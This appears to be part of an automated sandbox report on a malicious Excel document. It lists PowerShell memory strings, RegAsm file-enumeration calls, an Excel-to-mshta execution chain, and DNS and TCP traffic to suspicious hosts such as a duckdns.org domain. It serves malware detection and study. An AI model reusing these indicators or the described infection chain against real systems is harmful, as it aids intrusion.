                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000E.00000002.548581450.000007FE89A08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.551416551.000007FE89BC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.597286727.000007FE89BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.596399479.000007FE89A18000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.pdb source: powershell.exe, 00000007.00000002.453491405.0000000002F60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: .pdbW source: powershell.exe, 00000007.00000002.458812046.000000001C370000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,17_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10006580 FindFirstFileExA,17_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040AE51 FindFirstFileW,FindNextFileW,21_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,30_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,30_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,30_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,30_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,30_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00407877 FindFirstFileW,FindNextFileW,30_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0044E8F9 FindFirstFileExA,30_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,30_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,30_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,30_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,30_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                    Software Vulnerabilities

                    barindex
                    Document exploit detected (process start blacklist hit)
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
                    Suspicious execution chain found
                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: global trafficDNS query: name: wrath.me
                    Source: global trafficDNS query: name: wrath.me
                    Source: global trafficDNS query: name: ia600102.us.archive.org
                    Source: global trafficDNS query: name: wrath.me
                    Source: global trafficDNS query: name: wrath.me
                    Source: global trafficDNS query: name: idabo.duckdns.org
                    Source: global trafficDNS query: name: geoplugin.net
                    Source: global trafficDNS query: name: ia600102.us.archive.org
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 178.237.33.50:80
                    Source: global trafficTCP traffic: 192.168.2.22:49177 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
